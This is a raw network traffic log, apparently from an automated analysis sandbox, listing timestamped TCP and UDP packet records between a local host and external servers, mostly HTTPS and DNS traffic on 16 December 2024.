                                                                                                                                                                                                                                                Dec 16, 2024 15:40:41.532032013 CET50014443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:41.532244921 CET50014443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:41.532259941 CET44350014116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:41.956151962 CET44350008116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:41.956280947 CET50008443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:41.956300974 CET44350008116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:41.956336975 CET44350008116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:41.956338882 CET50008443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:41.956392050 CET50008443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:41.957324028 CET50008443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:41.957338095 CET44350008116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:42.550837040 CET50017443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:42.550936937 CET44350017116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:42.551179886 CET50017443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:42.551295996 CET50017443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:42.551331997 CET44350017116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:42.931987047 CET44350014116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:42.932383060 CET50014443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:42.932888031 CET50014443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:42.932909966 CET44350014116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:42.935527086 CET50014443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:42.935540915 CET44350014116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:42.935585976 CET50014443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:42.935597897 CET44350014116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:43.973460913 CET44350017116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:43.973536015 CET50017443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:43.973916054 CET50017443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:43.973921061 CET44350017116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:43.976170063 CET50017443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:43.976175070 CET44350017116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:44.089365005 CET44350014116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:44.089437008 CET44350014116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:44.089543104 CET50014443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:44.089543104 CET50014443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:44.090532064 CET50014443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:44.090557098 CET44350014116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:44.847987890 CET44350017116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:44.848083973 CET44350017116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:44.848093033 CET50017443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:44.848164082 CET50017443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:44.849009037 CET50017443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:44.849056005 CET44350017116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:45.647557974 CET50023443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:45.647599936 CET44350023116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:45.647677898 CET50023443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:45.647898912 CET50023443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:45.647912025 CET44350023116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:47.053955078 CET44350023116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:47.054095030 CET50023443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:47.054501057 CET50023443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:47.054513931 CET44350023116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:47.056309938 CET50023443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:47.056314945 CET44350023116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:47.056380033 CET50023443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:47.056394100 CET44350023116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:47.056404114 CET50023443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:47.056408882 CET44350023116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:47.056433916 CET50023443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:47.056442022 CET44350023116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:47.056482077 CET50023443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:47.056493998 CET44350023116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:47.056534052 CET50023443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:47.056545973 CET44350023116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:47.056582928 CET50023443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:47.056636095 CET50023443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:47.056655884 CET50023443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:47.056850910 CET44350023116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:47.056927919 CET50023443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:47.056936026 CET44350023116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:48.685832024 CET44350023116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:48.685937881 CET44350023116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:48.686043024 CET50023443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:48.686232090 CET50023443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:48.686259031 CET44350023116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:48.740725994 CET50034443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:48.740822077 CET44350034116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:48.740915060 CET50034443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:48.741175890 CET50034443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:48.741210938 CET44350034116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:50.174046993 CET44350034116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:50.174199104 CET50034443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:50.174710989 CET50034443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:50.174738884 CET44350034116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:50.176377058 CET50034443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:50.176392078 CET44350034116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:51.081959963 CET44350034116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:51.082083941 CET50034443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:51.082125902 CET44350034116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:51.082150936 CET44350034116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:51.082170963 CET50034443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:51.082206011 CET50034443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:51.082465887 CET50034443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:51.082485914 CET44350034116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:51.084037066 CET50040443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:51.084089041 CET44350040116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:51.084161043 CET50040443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:51.084410906 CET50040443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:51.084430933 CET44350040116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:52.494818926 CET44350040116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:52.495060921 CET50040443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:52.495367050 CET50040443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:52.495384932 CET44350040116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:52.497617006 CET50040443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:52.497634888 CET44350040116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:53.407773972 CET44350040116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:53.407843113 CET50040443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:53.407869101 CET44350040116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:53.407886982 CET44350040116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:53.407926083 CET50040443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:53.407948971 CET50040443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:53.408088923 CET50040443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:53.408103943 CET44350040116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:01.547090054 CET49861443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:01.547158957 CET44349861162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:01.547410965 CET49860443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:01.547431946 CET44349860162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:03.951592922 CET5084853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:04.071466923 CET53508481.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:04.071557045 CET5084853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:04.191334009 CET53508481.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024435043 CET49904443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024467945 CET4434990423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024467945 CET49909443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024493933 CET49852443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024527073 CET44349852162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024547100 CET4434990923.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024615049 CET49851443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024647951 CET44349851162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024660110 CET49857443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024665117 CET44349857162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024723053 CET49855443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024807930 CET44349855162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024841070 CET49933443192.168.2.723.33.40.153
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024852037 CET49858443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024852037 CET49856443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024863958 CET49934443192.168.2.723.33.40.153
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024869919 CET4434993423.33.40.153192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024892092 CET44349858162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024907112 CET4434993323.33.40.153192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024913073 CET44349856162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024925947 CET49878443192.168.2.723.219.82.75
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024930954 CET4434987823.219.82.75192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024970055 CET49871443192.168.2.723.33.40.139
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.024996042 CET4434987123.33.40.139192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.166742086 CET5084853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.287561893 CET53508481.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.287761927 CET5084853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.286211014 CET50858443192.168.2.7150.171.28.10
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.286235094 CET44350858150.171.28.10192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.286313057 CET50858443192.168.2.7150.171.28.10
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.286457062 CET50858443192.168.2.7150.171.28.10
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.286467075 CET44350858150.171.28.10192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.558717012 CET49936443192.168.2.7204.79.197.219
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.558760881 CET44349936204.79.197.219192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.574374914 CET49935443192.168.2.7204.79.197.219
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.574404001 CET44349935204.79.197.219192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:07.931297064 CET44350858150.171.28.10192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:07.931797981 CET50858443192.168.2.7150.171.28.10
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:07.931816101 CET44350858150.171.28.10192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:07.932384968 CET44350858150.171.28.10192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:07.932447910 CET50858443192.168.2.7150.171.28.10
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:07.933425903 CET44350858150.171.28.10192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:07.933475018 CET50858443192.168.2.7150.171.28.10
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:07.935208082 CET50858443192.168.2.7150.171.28.10
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:07.935343981 CET44350858150.171.28.10192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:07.979947090 CET50858443192.168.2.7150.171.28.10
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:07.979964972 CET44350858150.171.28.10192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:08.028465033 CET50858443192.168.2.7150.171.28.10
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:09.198895931 CET49845443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:09.198932886 CET44349845172.64.41.3192.168.2.7

                                                                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:28.827749968 CET6515053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:28.965791941 CET53651501.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:31.156423092 CET5205453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:31.467752934 CET53520541.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:32.480695963 CET123123192.168.2.740.81.94.65
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:33.044223070 CET12312340.81.94.65192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:47.774465084 CET5900153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:47.774736881 CET4997653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:47.910260916 CET53576371.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:47.911634922 CET53590011.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:47.916599989 CET53499761.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:47.948569059 CET53600891.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:50.610160112 CET53631591.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:52.731405020 CET53614491.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:02.329718113 CET5307153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:02.330032110 CET6326953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:02.469289064 CET53632691.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:04.999963045 CET5894953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:05.000308037 CET5769153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:05.772066116 CET6498953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:05.772612095 CET5245453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:05.910219908 CET53649891.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:06.018834114 CET53524541.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.019522905 CET5478853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.022743940 CET5621953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.023587942 CET5525353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.023967981 CET5167553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.043452024 CET5024653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.043724060 CET6514453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.157438040 CET53547881.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.159883022 CET53562191.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.161148071 CET53516751.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.161192894 CET53552531.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.180618048 CET53502461.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.180651903 CET53651441.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:09.089505911 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:09.389611959 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:09.994963884 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.194369078 CET55145443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.215075016 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.215153933 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.215198040 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.215219021 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.216434956 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.217780113 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.219605923 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.241063118 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.327260017 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.466356993 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.481437922 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.496491909 CET55145443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.528908968 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.529063940 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.530126095 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.530167103 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.530571938 CET6087653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.530932903 CET6010253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.531908035 CET5459753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.532025099 CET5527953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.532274008 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.533716917 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.533799887 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.533809900 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.533818007 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.534074068 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.534308910 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.539493084 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.544688940 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.544709921 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.544720888 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.544925928 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.544936895 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.545892000 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.545947075 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.560591936 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.561198950 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.561480999 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.562546015 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.562731028 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.562942028 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.668060064 CET53601021.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.668528080 CET53608761.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.670222998 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.676826000 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.683173895 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.784635067 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.787344933 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.797578096 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.799066067 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.802350044 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.843040943 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.843080044 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.844372988 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.846036911 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.846225023 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.847779989 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.849942923 CET61510443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:11.002084970 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:11.003550053 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:11.003654003 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:11.003690958 CET44361510162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:11.003959894 CET44361510162.159.61.3192.168.2.7
